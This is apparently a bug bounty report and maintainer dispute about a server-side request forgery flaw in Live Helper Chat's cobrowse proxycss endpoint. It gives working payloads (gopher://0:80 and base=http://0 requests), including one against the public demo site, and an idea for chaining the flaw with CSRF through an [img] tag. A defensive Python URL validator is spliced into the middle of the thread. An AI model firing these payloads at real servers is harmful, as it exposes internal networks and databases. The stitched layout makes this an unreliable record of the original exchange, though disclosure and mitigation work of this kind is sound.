SSRF on index.php/cobrowse/proxycss/ in livehelperchat/livehelperchat
Reported on
Mar 29th 2022
Description
Live Helper Chat is vulnerable to SSRF on the /index.php/cobrowse/proxycss
endpoint. It's possible to make internal requests and see the response as an authenticated user. It's also possible to make a request with any protocol using gopher://.
Proof of Concept
- Request
http://127.0.0.1/index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&css=
GET /index.php/cobrowse/proxycss/1?base=gopher://0:80/xGET%20/&css= HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: lhc_vid=10c9573dc50925e9141f; PHPSESSID=1f91a362084b1d87c4ebdf255fc32629
Connection: close
This could be chained with the CSRF vulnerability https://huntr.dev/bounties/35ab4644-ff90-4723-ab05-ede4eddf69c6/ to achieve the SSRF without authentication.
Impact
An attacker could make the application perform arbitrary requests.
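The report shows two inputs the proxycss endpoint accepts without complaint: a non-HTTP scheme (gopher://) and a host literal ("0") that the operating system treats as the local machine. Below is an added example of the kind of validation a server-side fetch should apply before honouring a user-supplied base URL. It is not code from Live Helper Chat; the function names, the allowed scheme/port sets, and the stub DNS resolver (with its constructed host table) are assumptions made for this illustration.

```python
"""Validate a user-supplied base URL before a server-side fetch (SSRF guard).

Added example, not Live Helper Chat code. It rejects:
  * schemes other than http/https (so gopher:// never reaches the fetcher),
  * ports other than 80/443,
  * credentials embedded in the URL,
  * hosts that are, or resolve to, loopback / private / link-local /
    unspecified / reserved addresses, including numeric shorthand such as
    "0", "2130706433" or "0x7f000001" that clients expand to 127.0.0.1.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # assumption: proxy only fetches web CSS
ALLOWED_PORTS = {80, 443}             # assumption: no odd ports either


def _is_public_ip(ip) -> bool:
    """True only for an address a CSS proxy should be allowed to reach."""
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def _parse_ip_literal(host):
    """Return an ip_address for literal hosts, including integer shorthand.

    'host' arrives from urlsplit, so IPv6 brackets are already stripped.
    Returns None when the host is a name that needs DNS resolution.
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    # Decimal / hex forms ("2130706433", "0x7f000001", "0") that many HTTP
    # clients silently accept as an IPv4 address.
    try:
        return ipaddress.ip_address(int(host, 0))
    except (ValueError, TypeError):
        return None


def resolve_host(host, resolver=socket.getaddrinfo):
    """Return every IP address the host maps to, as ipaddress objects."""
    literal = _parse_ip_literal(host)
    if literal is not None:
        return [literal]
    ips = []
    for _family, _type, _proto, _canon, sockaddr in resolver(host, None):
        # sockaddr[0] may carry an IPv6 scope id ("fe80::1%eth0"); drop it.
        ips.append(ipaddress.ip_address(sockaddr[0].split("%")[0]))
    return ips


def check_proxy_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason). ok is True only for a public http(s) origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    try:
        ips = resolve_host(parts.hostname, resolver)
    except (socket.gaierror, ValueError, OSError) as exc:
        return False, f"cannot resolve host: {exc}"
    if not ips:
        return False, "host has no addresses"
    for ip in ips:
        if not _is_public_ip(ip):
            return False, f"host resolves to non-public address {ip}"
    return True, "ok"


# Constructed stub resolver so the example runs offline; not a real DNS view.
_DEMO_HOSTS = {"example.com": "93.184.216.34", "intranet.local": "10.0.0.5"}


def _demo_resolver(host, port):
    if host not in _DEMO_HOSTS:
        raise socket.gaierror(f"{host}: name not known (stub)")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (_DEMO_HOSTS[host], 0))]


if __name__ == "__main__":
    # The two inputs from the report plus a few common bypass shapes.
    for candidate in ("gopher://0:80/xGET%20/", "http://0", "http://0x7f000001/",
                      "http://[::1]/", "http://intranet.local/",
                      "https://example.com/style.css"):
        print(candidate, "->", check_proxy_url(candidate, _demo_resolver))
```

Two caveats apply when wiring a check like this into a real proxy. The address is validated at check time, so the fetch must connect to the validated IP rather than resolving the name a second time (otherwise a DNS answer that changes between the two lookups defeats the check), and redirects returned by the remote server must be passed back through the same validation before being followed.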
Provide full steps to reproduce, as this is just a theoretical issue without real impact: all information-sensitive URLs are protected via CSRF.
Hi Remigijus,
PoC
1. Login on https://demo.livehelperchat.com/
2. Access https://demo.livehelperchat.com/site_admin/cobrowse/proxycss/1?base=http://0&css=
You will see the response of the local Nginx server.
Impact
SSRF is a high-impact vulnerability, as an attacker can force the server to send requests. With this SSRF it's possible to access the internal network and cloud infrastructure. Using the gopher:// protocol an attacker can send requests in any protocol, not only HTTP, accessing the local MySQL database for example.
Although the endpoint is only accessible to authenticated users, using the https://huntr.dev/bounties/35ab4644-ff90-4723-ab05-ede4eddf69c6/ bug an attacker can put the malicious link in the [img] tag, and the SSRF will trigger when the Admin accesses the message.
You can read more about SSRF here : https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
I don't see any problem with seeing the default nginx webpage. Please provide a real-world PoC.
And the one with the [img] tag I closed, because your PoC is invalid as sensitive information is protected with CSRF.